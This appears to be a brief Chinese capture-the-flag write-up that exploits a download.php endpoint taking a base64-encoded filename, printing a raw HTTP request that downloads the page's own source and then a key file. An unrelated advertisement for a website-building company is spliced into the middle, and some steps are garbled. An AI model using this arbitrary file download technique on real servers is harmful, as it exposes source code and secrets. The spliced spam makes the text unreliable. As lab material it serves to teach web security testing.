（1）打開網(wǎng)頁

（2）同樣的先抓下包

和順網(wǎng)站建設(shè)公司創(chuàng)新互聯(lián),和順網(wǎng)站設(shè)計(jì)制作，有大型網(wǎng)站制作公司豐富經(jīng)驗(yàn)。已為和順1000+提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\外貿(mào)網(wǎng)站制作要多少錢，請找那個(gè)售后服務(wù)好的和順做網(wǎng)站的公司定做！

我們注意到：
url=Y2hvdWJhZ3VhaS5tcDM 還有/download.php

先解碼看看是什么

是個(gè)文件名

（3）我們試著將其替換成、download.php

GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1
Host: e2ad76b4d4b6d6ed.yunyansec.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/
Accept-Language: zh-CN,zh;q=0.9
Connection: close

（4）文件下載成功，打開后發(fā)現(xiàn)還可以有hereiskey.php下載

同樣先編碼

得到key